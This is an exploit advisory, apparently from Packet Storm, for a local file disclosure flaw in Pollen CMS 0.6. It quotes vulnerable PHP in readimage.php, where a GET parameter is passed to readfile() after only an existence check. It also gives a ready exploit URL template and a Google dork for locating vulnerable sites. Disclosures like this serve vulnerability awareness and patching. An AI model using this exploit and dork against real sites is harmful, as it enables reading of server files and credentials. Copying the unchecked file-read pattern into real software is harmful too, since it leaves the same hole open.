Pollen CMS 0.6 File Disclosure

2013-04-01T00:00:00
ID PACKETSTORM:121036
Type packetstorm
Reporter MizoZ
Modified 2013-04-01T00:00:00

Description

                                        
                                            `# Title: Pollen CMS <= 0.6 - Local File Disclosure  
# Google Dork: intext:"Powered by Pollen CMS"  
# Date: 25 Mars 2013  
# Exploit Author: MizoZ  
# Vendor Homepage: pollencms.com (BROKEN)  
# Software Link: https://code.google.com/p/pollencms/  
# Version: 0.6  
# Tested on: Ubuntu Desktop 12.04  
  
-- File "[path]/core/lib/readimage.php"  
  
02 - $image=urldecode($_GET["image"]);  
03 - if(is_file($image)){  
04 - header("Pragma: no-cache");  
05 - header("Expires: 0");  
06 - header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");  
07 - header("Cache-Control: no-cache, must-revalidate");  
08 - header("Content-type: image/jpg");  
09 - readfile($image);  
10 - }else{  
11 - header("HTTP/1.0 404 Not Found");  
12 - }  
  
  
-- Problem  
  
The script only verifies the existence of the given file.  
  
  
-- Exploit  
  
http://[ws]/[path]/core/lib/readimage.php?image=[LFI]  
`